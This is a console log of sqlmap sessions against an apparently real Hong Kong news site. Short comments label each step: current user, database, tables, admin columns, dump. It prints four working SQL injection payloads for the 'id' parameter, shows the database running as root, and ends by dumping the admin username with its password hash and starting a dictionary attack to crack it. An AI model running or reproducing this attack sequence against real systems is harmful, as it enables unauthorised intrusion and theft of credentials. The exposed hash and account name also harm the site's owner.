D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap> |